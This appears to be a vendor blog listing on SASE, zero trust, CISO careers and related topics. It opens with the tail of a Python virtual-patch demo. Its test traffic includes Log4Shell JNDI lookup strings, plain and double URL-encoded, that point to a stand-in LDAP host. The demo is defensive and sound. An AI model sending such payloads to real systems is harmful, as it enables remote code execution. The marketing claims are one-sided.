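        Request("branch-b",
                "/search?q=%24%7Bjndi%3Aldap%3A%2F%2Fexample.invalid%2Fx%7D"),
        Request("datacenter", "/api/notes", body=(
            "note=%2524%257Bjndi%253Aldap%253A%252F%252F"
            "example.invalid%252Fx%257D")),
        Request("branch-a", "/docs/jndi-overview",
                {"User-Agent": "Mozilla/5.0"}),
    ]
    before = [layer.handle(r)[0] for r in traffic]  # no virtual patch yet
    layer.deploy(LOG4J_LOOKUP)                      # mitigate once
    reached.clear()
    after = [layer.handle(r)[0] for r in traffic]   # protected everywhere
    return {"before": before, "after": after,
            "reached_after": list(reached), "blocked": layer.blocked}


if __name__ == "__main__":
    print(demo())
```

The benign request that merely contains the word "jndi" still reaches its backend, which is the property to check when tuning a virtual patch against false positives.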
December 15, 2022
An Inside Look at Life Before and After Deploying SASE
SASE (Secure Access Service Edge) is an enterprise networking and security service that converges SD-WAN with multiple security functions - including FWaaS, CASB, DLP, SWG, and ZTNA - into a converged, cloud-native service that is manageable, optimized, secure and easy to use. But what does life after SASE really look like when implemented in an enterprise? To find out, we interviewed Ben De Laat, Head of IT Security at BrandLoyalty, who implemented Cato’s SASE Cloud, together with trusted Cato Partner and IPknowledge’s Managing Director, Steven de Graaf, who assisted with the implementation. This blog post is an abridged version of their insights. For a more detailed account of their experiences, you can read the full eBook, here: “Life after deploying SASE”.
SASE Migration Use Cases
First, let’s start our SASE journey by understanding when the best time to transition to SASE is. It’s strongly recommended to consider a migration to SASE when:
MPLS contracts are up for renewal and can be replaced with a more secure and higher performing alternative at a lower cost.
Employees are working at multiple global locations and require a secure and frictionless solution.
IT is managing complex networking environments and needs a simple-to-use, high-performing and secure substitute.
The workforce is employed remotely or in a hybrid manner and needs a scalable and secure solution to connect all employees, but without backhauling and based on least-privileged access.
Your SASE Migration Plan
The operational migration to SASE is quick and efficient, sometimes requiring only weeks from start to finish! To accommodate and complement this quick shift, it is recommended to prepare a well thought out plan that can help evangelize the transition internally, monitor it and track success. We recommend such a migration plan include:
The strategic business value - How SASE will enable employees to focus on their core responsibilities, instead of them having to spend time and become frustrated when dealing with the effects of misconfigured firewalls or URL filters that are blocking valid websites.
The technological value - How SASE’s converged architecture and single software stack will eliminate IT and IS overhead and hassle, ensure optimized connectivity and provide an optimal security posture.
The financial value - How SASE will reduce the annual costs of networking and security, coupled with the value to the business.
Life After SASE: What’s New?
What can IT leaders, security professionals and business leaders expect once they’ve migrated to a SASE service? Here are six new SASE-driven organizational achievements that will make you throw your hands in the air and wonder why you didn’t migrate to SASE sooner.
Newfound Network Visibility - SASE’s convergence of end-to-end networking and security provides newfound visibility into the network. Rather than having network and security information split between discrete tools and services, IT has a single pane of glass with visibility into the entire network. All security and networking events are stored in a common database, mapped onto a single timeline. With one timeline for networking and security, IT can troubleshoot problems faster, spot anomalies quicker, and enable better operational monitoring.
An Optimal Security Posture - SASE provides insights into which systems and services are being used by employees and third parties and their vulnerabilities. If necessary, this information can also help IT identify system replacements and eliminate shadow IT.
Better IT Services for the Business and for Users - SASE’s seamless, unified service displaces point solutions in a robust and reliable manner. This new architecture enables IT to monitor operational activity so they can optimize line provisioning. In addition, with SASE replacing the grunt work, IT teams have more time to work on strategic business initiatives.
Seamless Remote Work Unlocked - SASE replaces high latency VPNs. Instead, traffic is routed over a global private backbone and monitored for threats. The result is high-performance and secure connectivity for all users, everywhere.
Optimized Connectivity and Performance - SASE optimizes performance and the user experience by throughput maximization, providing increased and cost-effective bandwidth by routing traffic on a cloud-native, global, private backbone with multiple internet access links and active-active configurations.
Peace of Mind - With SASE, both end-user and IT and IS can focus their efforts on fulfilling business-critical initiatives. No more operational overhead, fretting over updates and lack of visibility into metrics and performance.
Are you ready to get started with SASE? Read more about what the transition to SASE looks like in our new eBook “Life after deploying SASE”.
If you're a Security professional looking to become a CISO, then you've come to the right place. This five-step guide is your plan of action...
December 13, 2022
The 5-Step Action Plan to Becoming CISO
The Path to Becoming CISO Isn't Always Linear
There isn’t one definitive path to becoming a CISO.
Don’t be discouraged if your career path isn’t listed above or isn’t “typical.” If your end goal is to become a CISO, then you’ve come to the right place. Keep reading for a comprehensive action plan which will guide you from your current role in IT, IS or Cybersecurity and on the path to becoming a world-class CISO.
Becoming a CISO is About Changing Your Focus
The Difference Between IS, IT or Cybersecurity Roles and a CISO Role: Tactical vs. Strategic
Making The Shift from Security Engineer to Future CISO
The most common mistake that security engineers make when looking to become CISO is focus. To be successful as a security engineer the focus is on problem hunting. As a top-tier security professional, you must be the best at identifying and fixing vulnerabilities others can’t see.
How to Think and Act Like a Future CISO
While security engineers identify problems, CISOs translate the problems that security engineers find into solutions for C-suite, the CEO and the board. To be successful in the CISO role, you must be able to transition from problem-solver to a solution-oriented mindset.
A common mistake when transitioning to CISO is leading with what’s most familiar – and selling your technical competency. While understanding the tech is crucial when interfacing with the security team, it’s not the skillset you must leverage when speaking with C-suite and boards. C-suite and boards care about solutions – not problems. They must feel confident that you understand the business with complete clarity, can identify cyber solutions, and translate them in terms of business risks, profit and loss. To be successful in securing your new role, focus on leveraging cyber as a business enabler to help the business reach its targeted growth projections.
The Skillset Necessary to Become a CISO
Translate technical requirements into business requirements
Brief executives, VPs, C-level, investors and the board
Understand the business you’re in on a granular level (the company, its goals, competitors, yearly revenue generated, revenue projections, threats competitors are facing, etc.)
Excellent communication: Send effective emails and give impactful presentations
Balance the risk between functionality and security by running risk assessments
Focus on increasing revenue and profitability in the organization
Focus on a solution-oriented mindset, not an identification mindset
Getting Clear on the CISO Role: So, What Does a CISO Actually Do?
Learn The CISO’s Role and Responsibilities (R&R)
The CISO is essentially a translator between the security engineering team and C-suite.
Set Yourself Up for Success in the Role: Measure What Matters
What you measure in your role will ultimately determine your career success. Too often CISOs set themselves up for failure by playing a zero-sum security game.
This means any security incident = CISO gets fired = No one wins
But successful CISOs know that cybersecurity is a delicate balancing act between ensuring security and functionality.
100% security means 0 functionality, and vice versa
Strategic CISOs understand this and set themselves up for success by working with the CEO and board to minimize exposure and establish realistic KPIs of success.
Establishing Your Metrics of Success in the CISO Role
What makes CIOs so successful in their role?
A single metric of success: 5 9s.
This allows CIOs to focus on the R&R necessary to achieve this goal.
Suggested CISO KPI & KPI Setting Process
Run an analysis to see how many attempted attacks take place weekly at the organization, to establish a benchmark.
Provide an executive report with weekly attack attempt metrics (i.e., 300.)
Create a proposed benchmark of success: i.e., preventing 98% of attacks.
Get management signoff on your proposed KPIs.
Provide weekly reports to executives with defined attack metrics: attempted weekly attacks + prevented. (Ensuring security incidents are promptly reported to C-suite and board.)
Adjust KPIs as necessary and receive management signoff.
Mind the Gap: Bridge Your Current Technical and Business Gaps
Recommended Technical Education
GIAC / GSEC Security Essentials
CISSP (Certified Information Systems Security Professional)
OR CISM (Certified Information Security Manager) Certification
OR CISA (Certified Information Systems Auditor) Certification
SASE (Secure Access Service Edge) Certification
SSE (Security Service Edge) Certification
Recommended Technical Experience
At least 3-5 years in IS, Cybersecurity, Networking or IT with a strong security focus
Recommended Business Education
An MBA or equivalent business degree, or relevant business experience
CPA or accounting courses
Recommended Business Experience
Approximately 3-5 years of business experience
Business Operations, Business Management, SOC Manager, or roles that demonstrate your business, management and leadership acumen
Recommended Understanding Of:
Industry security standards including NIST, ISO, SANS, COBIT, CERT, HIPAA.
Current data privacy regulations, e.g., GDPR, CCPA and any regional standards.
How to Get a CISO Job with Limited or No Previous Experience
It’s the age-old dilemma – how do I get a job without relevant experience? And how do I get relevant experience without a job?
Take On a Virtual CISO Role at a Friend or Family Member’s Small Business
Offer 3 hours of virtual CISO service a week.
In exchange, ask for 3 recommendations a month and to serve as a positive reference.
Can you receive mentorship from an existing CISO?
Do friends, family or former colleagues know any CISOs you can connect with? Start there.
Reach out on LinkedIn to CISOs and invite them to coffee or dinner. Ask them if you can meet up and receive mentorship over dinner once a month (they pick the location, and you pay.)
Remember: It’s a numbers game. Don’t get discouraged after a few “no's” or a lack of responses.
Getting Your First CISO Job: Your Action Plan for Career Success
Applying For Jobs
Your resume has one and only one goal – to get you the interview.
Week 1:
Send out 20 resumes for CISO jobs with your existing resume
How many respond and request interviews (within 2 weeks)?
If you get under a 50-70% success rate, you need to revise your resume.
Your goal is to repeat this process until you get a minimum of 10 positive responses for every batch of 20 resumes you send out (giving recruiters 1.5 - 2 weeks to respond.) Be ready to adapt and adjust your resume as many times as necessary (using the defined process above,) until you hit your benchmarks of success.
Revising your Resume for Success
If you’re not hitting a 50-70% interview rate on your resume, it’s time to revise your resume. But what do you change?
The Most Common Mistakes Found on CISO Resumes (Don’t Fall into a Trap)
Your resume should not only highlight your technical abilities but your business acumen. Review the strategic skills highlighted earlier and emphasize those (in addition to any other relevant educational, professional, or career achievements.)
Have you briefed executives and boards?
Have you given effective presentations?
Have you created risk management programs and aligned the entire organization?
Do you lead an online forum on Cybersecurity best practices?
Think of ways to highlight your business and leadership savvy, not just your de facto technical abilities.
The Interview Rounds
The CISO interview process is generally between 5-7 interview rounds.
Remember: The goal of your first interview is only to receive a second interview. The goal of your second interview is to receive a third interview, and so on. Be prepared for interviews with legal, finance, the CEO, CIO, HR, and more.
You’ve Got This: The Road to Landing Your First CISO Role
Abraham Lincoln once said, “the best way to predict the future is to create it.” And we hope this guide gives you a running start towards your new and exciting future as a CISO. We believe in you and your future success. Good luck! And feel free to forward this guide to a friend or colleague who’s hunting for a new CISO role, if you feel it’s been helpful.
Life After Landing the Coveted CISO Role
Congrats! You’ve Been Hired as a CISO
You did it. You’ve landed your first CISO role. We couldn’t be prouder of the hard work and dedication that it took to get you to this point. Before you begin in your new role, here are a few best practices to guide you on your way to career success.
Ensuring Your Success in the CISO Role: Things to Keep in Mind
After speaking with 1000s of CISOs since 2016, it’s important to keep the following in mind:
Your Network Security Architecture Will Determine Your Focus and Impact
No matter the organization or the scope, your CISO role is dependent on meeting if not exceeding your promised KPIs. So, you’ll need to decide, do you want a reactive or a proactive security team? Do you want your team to spend their time hunting and patching security vulnerabilities and mitigating disparate security policies? Or devoted to achieving your larger, revenue-generating missions through cybersecurity? Accordingly, you’ll need to ensure that your network security architecture minimizes your enterprise’s attack surface, so you and your team can devote your attention accordingly.
To achieve this, your team must have full visibility and control of all WAN, cloud, and internet traffic so they can work on fulfilling your business objectives through cybersecurity. Otherwise, your function will revert to tactical, instead of focusing on serving as a business enabler through cybersecurity.
Cato SSE 360 = SSE + Total Visibility and Control
Disjointed security point solutions overload resource-constrained security teams, impacting security posture and increasing overall risk due to configuration errors. Traditional SSE (Security Service Edge) convergence mitigates these challenges but offers limited visibility and control that only extends to the Internet, public cloud applications, and select internal applications, thus leaving WAN traffic uninspected and unoptimized. And an SSE platform that isn’t part of single-vendor SASE can’t extend convergence to SD-WAN to complete the SASE transformation journey.
Cato Networks’ SSE 360 service will allow you to solve this. SSE 360 optimizes and secures all traffic, to all WAN, cloud, and internet application resources, and across all ports and protocols. For more information about Cato’s entire suite of converged network security, please be sure to read our SSE 360 Whitepaper. Complete with configurable security policies that meet the needs of any enterprise IS team, see why Cato SSE 360 is different from traditional SSE vendors.
December 12, 2022
Gartner Names Top I&O Trends for 2023
Gartner has just issued a press release announcing its Top Trends Impacting Infrastructure and Operations for 2023. Among the six trends that will have significant impact over the next 12 to 18 months, Gartner named the Secure Access Service Edge (SASE), sustainable technology, and heated skills competition.
Below is a discussion of these trends and how they are interrelated.
Secure Access Service Edge (SASE) was created by Gartner in 2019 and has repeatedly been highlighted as a transformative category. According to Gartner’s press release, “SASE is a single-vendor product that is sold as an integrative service which enables digital transformation.” Practically, SASE enables secure, optimal, and resilient access by any user, in any location, to any application. This basic requirement had been fulfilled for years by a collection of point solutions for network security, remote access, and network optimization, and more recently with cloud security and zero trust network access. However, the complexity involved in delivering optimal and secure global access at the scale, speed, and consistency demanded by the business requires a new approach.
Gartner’s SASE proposes a new global, cloud-delivered service that enables secure and optimal access everywhere in the world. Says Gartner analyst Jeffrey Hewitt: “I&O teams implementing SASE should prioritize single-vendor solutions and an integrated approach.” SASE’s innovation is the re-architecture of IT networking and network security to enable IT to support the demands of the digital business.
This is the tricky part about SASE: while the capabilities, also offered by legacy point solutions, are not new, the platform architecture is brand new. To deliver scalable, resilient, and global secure access that is also agile and fast, SASE must live in the cloud as a single holistic platform.
SASE architecture also has a direct impact on the competition for skills. When built from the ground up as a coherent and converged solution delivered as a service, SASE is both self-maintaining and self-healing. A cloud-native SASE platform delivered “as a service” offloads the infrastructure maintenance tasks from the IT staff. Simply put, a smaller IT team can run a complex networking and network security infrastructure when supported by a cloud-native SASE provider, such as Cato Networks. The SASE provider maintains optimal security posture against emerging threats, seamlessly upgrades the platform with new capabilities, and reduces the time to detect, troubleshoot and fix problems. Using the right SASE platform, customers will also alleviate the pressure to acquire the right skills to support and maintain individual point solutions, and the resources needed to “keep the lights on” by maintaining a fragmented infrastructure in perfect alignment and optimal posture.
Beyond skills, SASE also has a positive impact on technology sustainability. Cloud-native SASE service eliminates a wide array of edge appliances including routers, firewalls, WAN optimizers and more. By moving the heavy lifting of security inspection and traffic optimization to the cloud, network edge footprint and processing requirements will decline, reducing the power consumption, cooling requirements, and environmental impact of edge appliance disposition.
The road to simpler, faster, and secure access starts with a cloud-native, converged, single vendor SASE. Customers can expect better user experience, improved security posture, agile support of strategic business initiatives, and a lower environmental impact.
Fireside Chat About Network Security With ChatGPT (AI)
On one artificially cold evening, I invited myself to an intimate fireside chat with my new BFF, ChatGPT, who I now call CG for short.
Since it is a new artificial intelligence open to helping humans such as myself understand the universe we live in, I wanted to pick its brain (or should it be brains, in plural?) about a topic close to my heart.
I opened asking:
Can I ask you a few questions about network security?
And CG answered:
Sure, I would be happy to help with any questions you have about network security. As a large language model trained by OpenAI, I have been trained on a wide range of text and I can generate human-like responses based on the input that I receive.
What are the common components in network security?
CG knew it right away:
There are several common elements that are often found in network security, including:
Firewalls: These are devices or software programs that control incoming and outgoing network traffic based on predetermined security rules.
Encryption: This is the process of encoding data so that it can be transmitted securely and only accessed by authorized users.
Access control: This refers to the policies and procedures that regulate who or what is allowed to access specific network resources.
Intrusion detection and prevention: These are systems that monitor network traffic for signs of malicious activity and take action to prevent or respond to attacks.
Virtual Private Networks (VPNs): These are networks that use encryption and other security measures to create a secure connection over a public network, such as the internet.
Security patches and updates: Regularly applying security patches and updates to network devices and software is essential for closing vulnerabilities and keeping networks secure.
With all those components traditionally being on-premises, I asked:
What are the limitations of on-premises security products?
CG seemed to know exactly where I was going with this:
The limitations of on-premises security products can vary depending on the specific product and the context in which it is used. However, some common limitations of on-premises security products include:
High upfront cost: On-premises security products often require a significant upfront investment, including the cost of hardware, software, and installation. This can be a barrier for organizations with limited budgets.
Limited scalability: On-premises security products are typically designed for a specific number of users or devices, and adding additional users or devices can be challenging and costly. This can make it difficult for organizations to keep pace with growing needs.
Dependence on local infrastructure: On-premises security products are typically installed and operated on the organization's own servers and networks, which can create dependencies on local infrastructure. If there are problems with the local infrastructure, it can affect the availability and performance of the security product.
Maintenance and support: On-premises security products require ongoing maintenance and support, which can be time-consuming and costly. Organizations may need to hire specialized staff or contract with third-party service providers to provide this support.
Limited flexibility and agility: On-premises security products are often inflexible and can be slow to adapt to changing needs and requirements. This can make it difficult for organizations to respond quickly to new threats or opportunities.
Overall, the limitations of on-premises security products can make them less suitable for organizations that need to scale quickly, are constrained by budgets, or require high levels of flexibility and agility.
I wanted to know a bit more, so I asked:
What about remote users? Where does ZTNA fit in here?
As you can imagine, CG is never caught off guard:
Remote users are individuals who access a network or its resources from outside the organization's physical location. In terms of network security, remote users present unique challenges, as they are often accessing the network over a public network such as the internet, which can be vulnerable to attacks.
One way to address these security challenges is through the use of a Zero Trust Network Architecture (ZTNA), which is a network security model that assumes that all users, regardless of location, are untrusted until they have been authenticated and authorized. With ZTNA, access to network resources is strictly controlled and only granted on a need-to-access basis. This approach can help to protect against a wide range of security threats, including those posed by remote users.
CG was starting to complain that I was asking too many questions too quickly, so I felt it was time to wrap it up with one final question:
Can you explain what is SASE and why it is important to digital enterprises?
CG was kind (and wise), and answered me this:
SASE, or Secure Access Service Edge, is a new approach to networking and security that is gaining popularity in the digital enterprise world. It is important because it combines networking and security functions into a single, cloud-based service, which offers several advantages over traditional networking and security approaches.
One of the key benefits of SASE is that it allows organizations to connect users and devices securely to any application or service, no matter where they are located. This means that employees can access the resources they need to do their job, even if they are working remotely or on-the-go. This can help improve productivity and enable organizations to support a remote and mobile workforce.
Another advantage of SASE is that it provides a more flexible and scalable approach to networking and security. Traditional networking and security solutions are often complex and inflexible, making it difficult for organizations to adapt to changing business needs. With SASE, organizations can easily add or remove users and devices, and scale their network and security capabilities up or down as needed.
Finally, SASE can help organizations reduce their networking and security costs. Because SASE is delivered as a cloud-based service, organizations don't have to invest in expensive hardware and software to set up and manage their networking and security infrastructure. This can help organizations save money and reduce the burden on their IT teams.
Overall, SASE is important to digital enterprises because it offers a more flexible, scalable, and cost-effective approach to networking and security.
I am not sure what the future holds for AI and for humanity, and whether there’s a place on earth for both of us, but for now, chatting with an AI is just fun.
Thank you, CG (https://chat.openai.com/)
Cloud-Based Security is Well-Suited for Zero Trust Architectures
As companies look to reduce corporate risk, protect against data breaches and other incidents, and maintain regulatory compliance, a zero trust security strategy provides significant advantages when compared to legacy models.
However, zero trust is only effective if it is enforced and supported by strong security solutions. For most organizations, cloud-based solutions are the only means of supporting a secure, high-performance, and scalable zero trust architecture.
Effective Zero-Trust is Resource-Intensive
The zero trust security model was designed to address the inadequacies of traditional, castle-and-moat security. Under this legacy security model, all insiders are implicitly trusted and granted unrestricted access to corporate assets, while traffic crossing the boundary of the corporate network is considered suspect and subject to inspection. As cloud adoption and remote work become more common and cyber threat actors grow more sophisticated, this model is increasingly ineffective.
Zero trust security says that no one, internal or external, should be implicitly trusted. Instead, requests for access to corporate resources are considered on a case-by-case basis. Additionally, access controls are defined based on the principle of least privilege, minimizing access and limiting the potential impact of a compromised account.
However, while zero trust provides much better security than legacy models, it comes at the cost of additional resource consumption. Unlike virtual private networks (VPNs) used by the legacy security models, zero-trust network access (ZTNA) solutions must evaluate each access request against role-based access controls and other criteria. Additionally, authenticated users are monitored throughout their session for potential threats or risky actions, and these sessions are terminated as needed.
As corporate networks grow and traffic volumes expand, network security resource requirements increase as well. Without the right infrastructure, applying robust protections to growing networks without sacrificing network performance can be difficult.
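The per-request evaluation and in-session monitoring described above can be made concrete with a small policy engine. This is an added example, not code from Cato or any ZTNA product: the roles, applications, risk scores and the termination threshold are constructed assumptions. It shows the three behaviors that distinguish this model from a connect-once VPN: default deny outside the role's grants, re-checking conditions on every request, and cutting off a live session when monitoring raises its risk.

```python
from dataclasses import dataclass, field

# Constructed policy: role -> explicitly granted (application, action) pairs.
# Anything not listed is denied (least privilege, default deny).
ROLE_GRANTS = {
    "finance-analyst": {("erp", "read"), ("erp", "export")},
    "helpdesk": {("ticketing", "read"), ("ticketing", "write")},
}
RISK_LIMIT = 70   # assumed score at which a live session is terminated


@dataclass
class Session:
    user: str
    role: str
    device_compliant: bool
    risk: int = 0
    active: bool = True
    audit: list = field(default_factory=list)


def evaluate(session, app, action):
    """Decide a single request. Earlier 'allow' results are never reused."""
    if not session.active:
        verdict = ("deny", "session terminated")
    elif not session.device_compliant:
        verdict = ("deny", "device out of compliance")
    elif (app, action) not in ROLE_GRANTS.get(session.role, set()):
        verdict = ("deny", "not granted to role")
    else:
        verdict = ("allow", "role grant")
    session.audit.append((app, action) + verdict)
    return verdict


def observe(session, signal, score):
    """Monitoring hook: record a risk signal, end the session past the limit."""
    session.risk += score
    session.audit.append(("monitor", signal, "risk", str(session.risk)))
    if session.risk >= RISK_LIMIT:
        session.active = False
    return session.active


def demo():
    s = Session("dana", "finance-analyst", device_compliant=True)
    out = [
        evaluate(s, "erp", "read"),          # granted to the role
        evaluate(s, "ticketing", "write"),   # authenticated, but not granted
    ]
    s.device_compliant = False               # posture check fails mid-session
    out.append(evaluate(s, "erp", "read"))   # same request is now denied
    s.device_compliant = True
    observe(s, "sign-in from new country", 40)
    out.append(evaluate(s, "erp", "export"))  # risk 40 is below the limit
    observe(s, "bulk export outside working hours", 40)  # risk 80: terminated
    out.append(evaluate(s, "erp", "read"))   # nothing passes after termination
    return out, s


if __name__ == "__main__":
    decisions, session = demo()
    for d in decisions:
        print(d)
```

Every call to `evaluate` and `observe` is work the enforcement point performs per request or per event, which is the resource cost the section attributes to zero trust.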
Why Zero Trust Should Be Built In the Cloud
Historically, corporate security architectures have been deployed on-prem as part of a castle-and-moat security model. However, in the modern network, this increasingly causes network latency and performance degradation as traffic is backhauled to a central location for inspection.
As organizations work to implement zero-trust security across their entire IT infrastructures, security architectures should move to the cloud. Cloud-native security solutions provide numerous benefits, including:
Asset Location Agnostic: Companies are increasingly moving applications and data storage to the cloud, and the adoption of Software as a Service (SaaS) solutions contributes to this trend. Deploying security in the cloud means that it is close to where an organization’s applications and data are located, reducing the network latency and performance impacts of security inspection.
Greater Scalability: Cloud-native ZTNA solutions have the ability to scale to meet demand. Like microservices, additional instances can be deployed or allocated as needed to handle growing traffic volumes or computationally intensive security inspection.
Global Reach: As companies embrace remote or hybrid work models, employees may spend part or all of their time outside of the office. A ZTNA solution deployed as part of a global network can minimize latency impacts on user requests by bringing security near the network edge.
As corporate networks grow larger and more distributed, security must be scalable and not geographically constrained by the location of an organization’s on-prem infrastructure. Cloud-based — and more specifically cloud-native — security is essential to implementing effective zero-trust security without sacrificing network performance and employee productivity.
Implementing Zero Trust with SSE and SASE
A globally distributed, cloud-native ZTNA solution can meet the access control requirements of a corporate zero trust security program. However, effective zero trust is more than simply implementing least privilege access controls for all access requests. Once a user has authenticated, their entire session should be monitored for suspicious or malicious activities that could place the organization at risk.
To accomplish this, an organization requires additional security capabilities, such as a next-generation firewall (NGFW), an intrusion prevention system (IPS), a secure web gateway (SWG), and a cloud access security broker (CASB). Hosting these capabilities on-prem eliminates the benefits of cloud-based ZTNA as it forces traffic to be backhauled for security inspection and imposes the same scalability limitations of on-prem appliances. Effective zero trust requires a fully cloud-native network security stack.
Security Service Edge (SSE) and Secure Access Service Edge (SASE) are ideally suited to implementing zero trust security for the growing corporate WAN. SSE and SASE solutions integrate ZTNA functionality with a full network security stack, including Firewall as a Service (FWaaS), IPS, SWG, and CASB. SASE goes a step further, incorporating SD-WAN and network optimization capabilities as well. Deployed as a global, cloud-native solution, SSE and SASE implement a scalable, high-performance zero trust architecture.
Cato provides the world’s most robust single-vendor SASE platform, converging Cato SD-WAN and a cloud-native security service edge, Cato SSE 360, including ZTNA, SWG, CASB/DLP, and FWaaS into a global cloud service. With over 75 PoPs worldwide, Cato optimizes and secures application access for all users and locations, and is easily managed from a single pane of glass. Learn more about how Cato SASE Cloud makes building a zero trust security architecture that grows with the business easy by signing up for a free demo today.
Your Employees Need High-Performance, Secure Internet Access (and Aren’t Getting It)
Computers have become a core component of the modern company. Many employees spend most or all of their workdays on them, interacting with a variety of different pieces of software. To do their jobs, employees need high-performance, secure access to corporate networks and IT assets. This is true whether an employee is working from the office or from off-site.
As remote and hybrid work schedules become more common, companies are deploying secure remote access solutions, such as virtual private networks (VPNs) to support them. However, this often means making tradeoffs between the performance of remote workers’ network connectivity and its security.
High-Performance Internet Access is Essential for the Modern Business
In the past, most of an organization’s employees worked on-site. This meant that they were connected directly to the headquarters network and protected by its perimeter-based security solutions. However, in recent years, a growing percentage of an organization’s employees are working from outside the office. Companies have adopted remote and hybrid work policies in response to the COVID-19 pandemic and to take advantage of the global workforce. At the same time, corporate IT assets are increasingly moving to the cloud. Software as a Service (SaaS) and cloud-native applications can offer improved performance, availability, and scalability for an organization’s employees and customers.
As a result of these shifts, the corporate LAN is becoming increasingly irrelevant as it hosts a diminishing percentage of an organization’s IT assets. However, the headquarters network is also where an organization’s security solutions are located and where the traffic is routed. Remote workers need high-performance network access to corporate networks and resources. Yet the design of many modern corporate networks means that this is not always a reality.
Where Legacy Secure Remote Access Falls Short
With a growing percentage of corporate workforces working on remote or hybrid schedules, a secure remote access VPN is essential. In many cases, companies are reliant on VPNs to provide this capability. Legacy VPN solutions are simply not designed to meet the needs of the modern enterprise.
Some of the primary ways in which they fall short include:
Inefficient Routing: Remote access VPNs are designed to route remote workers’ traffic to a VPN server, which is typically located on the corporate headquarters network. However, with a growing percentage of companies’ IT assets not located on-prem, this creates inefficient routing that degrades network performance and increases latency.
Inadequate Security: From a security perspective, all that a VPN does is provide an encrypted tunnel over which traffic is sent between the remote worker and the corporate network. Protecting against cyber threats and implementing a zero-trust security policy requires additional solutions alongside or instead of the VPN servers, which increases the cost and complexity of an organization’s IT infrastructure and limits its scalability.
VPNs were designed to implement a perimeter-focused security model where most of an organization’s IT assets were located on the headquarters network and needed to be protected against external threats. But this security model is no longer effective.
As a result, employees and companies are suffering from poor network performance in their remote access solutions as they try to use legacy secure remote access solutions to implement an outdated security model for a network architecture that no longer exists.
Choosing Both Performance and Security
VPNs’ design and lack of built-in security force a tradeoff between network performance and security. Routing remote workers’ network traffic through the headquarters network for security inspection creates inefficient routes and network latency for remote users and cloud-based assets. Allowing remote users to connect directly to cloud-based assets, which provides the network performance that companies need, bypasses perimeter-based security stacks and leaves the organization at risk due to VPNs’ lack of built-in security.
Avoiding the tradeoff between network performance and security requires replacing legacy VPNs with a modern remote access solution. Secure Access Service Edge (SASE) provides numerous benefits over VPNs, including:
Cloud-Native Design: SASE solutions are deployed on globally distributed points of presence (PoPs). This allows them to be deployed geographically near an organization’s IT assets, reducing network latency, and enables them to take full advantage of the benefits of the cloud, such as scalability and availability.
Zero-Trust Access Control: SASE solutions integrate secure remote access capabilities in the form of zero-trust network access (ZTNA). This allows them to implement zero-trust access controls for remote users, a capability that VPNs do not share.
Integrated Security: SASE solutions combine ZTNA with a full network security stack and network optimization capabilities. Integrating security solutions with ZTNA eliminates the need for standalone security solutions alongside a VPN endpoint and enables direct connectivity to cloud-based assets without backhauling traffic to an on-prem security architecture or sacrificing security for network performance.
Corporate networks and business needs are evolving, and VPNs are not keeping up. Cato SASE Cloud, the world’s most mature single-vendor SASE platform, provides companies with the ability to support their remote workers with high-performance, secure network access. Learn more about improving the performance and security of your corporate WAN by signing up for a free demo of Cato SASE Cloud today.
November 29, 2022
SASE is the Right Choice for Cyber Risk Management
Cybersecurity is all about risk management. Companies are faced with numerous, diverse cyber threats, and the job of the corporate security team is to minimize the risk of a data breach, ransomware infection, or other costly and damaging security incident.
Cybersecurity tools and solutions are designed to help companies to achieve this goal of managing enterprise security risk. Of the many options out there, Secure Access Service Edge (SASE) is ideally suited to supporting all aspects of a corporate cyber risk management program.
Companies Face Significant Cyber Risks
Cybersecurity has become a top-of-mind concern for most businesses. Data breaches and ransomware attacks occur on a regular basis, often with price tags in the millions of dollars. Avoiding these incidents is essential to the profitability and survival of the business. With the growth of automated attacks and an “as a Service” cybercrime economy, the bar to entry into the cybercrime space has fallen. As cybercrime groups grow more numerous and sophisticated, any organization can be the target of a devastating attack.
Risk treatment strategies
Companies facing growing levels of cybersecurity risk need to take steps to manage these risks. In general, companies have four tools for risk treatment strategies: mitigation, transference, avoidance, and acceptance.
Risk treatment by mitigation focuses on reducing the risk to the organization by implementing security controls. For cybersecurity risks, this could include patching vulnerable systems or deploying threat prevention capabilities that can identify and block attempted attacks before they reach vulnerable systems.
SASE solutions are ideally suited to threat mitigation due to their global reach and convergence of many security functions — including a next-generation firewall (NGFW), intrusion prevention system (IPS), cloud access security broker (CASB), zero-trust network access (ZTNA), and more — within a single solution. By consistently enforcing security policies and blocking attacks across the entire corporate WAN, SASE dramatically reduces an organization’s cybersecurity risk.
Transference involves handing over responsibility for managing risk to a third-party provider. A common form of risk transference is taking out an insurance policy. In the event that an organization experiences a risk event — such as a cyberattack — the insurance provider takes on most or all of the cost of remediating the issue and restoring normal operations.
As a managed service, SASE can be useful for risk transference because much of the responsibility for implementing a strong security program is the responsibility of the service provider, rather than the organization. For example, maintaining the security stack — a process that can require in-depth network understanding and security expertise — is outsourced with the Firewall as a Service (FWaaS) capabilities of managed SASE deployments.
By enabling an organization to implement a mature security program and improving corporate security visibility and threat prevention, managed SASE makes it easier for organizations to get cybersecurity insurance. This is especially important with the rising risk of ransomware attacks, as insurance providers are implementing increasingly stringent security requirements for organizations to take out security policies.
In some cases, cybersecurity risks that an organization may face are avoidable. For example, if a particular vulnerability poses a significant risk to an organization’s security, the choice to stop using the vulnerable component eliminates the risk to the organization. Avoidance-based risk treatment strategies can be highly effective, but they can come with opportunity costs if a secure alternative is not available for a vulnerable component.
SASE supports risk avoidance by offering a secure alternative to legacy network security solutions. Historically, many organizations have relied on a castle-and-moat security model supported by virtual private networks (VPNs) and similar solutions. However, these models have significant shortcomings, not least the rapid dissolution of the network perimeter as companies adopt cloud computing, remote work, Internet of Things (IoT), and mobile devices.
SASE solutions help to avoid the risks associated with legacy, castle-and-moat security models by supporting granular application-based protection. With zero-trust network access (ZTNA) built into SASE solutions, organizations can avoid the security risks associated with legacy VPNs, such as poor access management.
Completely eliminating all risk is impossible, and, in some cases, the return on investment of additional risk treatment may be too low to be profitable. Companies need to determine the level of risk that they are willing to accept — their “risk appetite” — and use other risk treatment methods (mitigation, transference, and avoidance) to reduce their risk down to that level.
Ensuring that accepted cyber risk is within an organization’s risk appetite requires comprehensive visibility into an organization’s IT infrastructure and the risks associated with it. SASE provides global visibility into activities on the corporate WAN, and built-in security solutions enable an organization to gauge their exposure to various cyber threats and take action to manage them (via firewall security rules, CASB policies, and other controls) or intelligently accept them.
Cybersecurity Risk Management with Cato
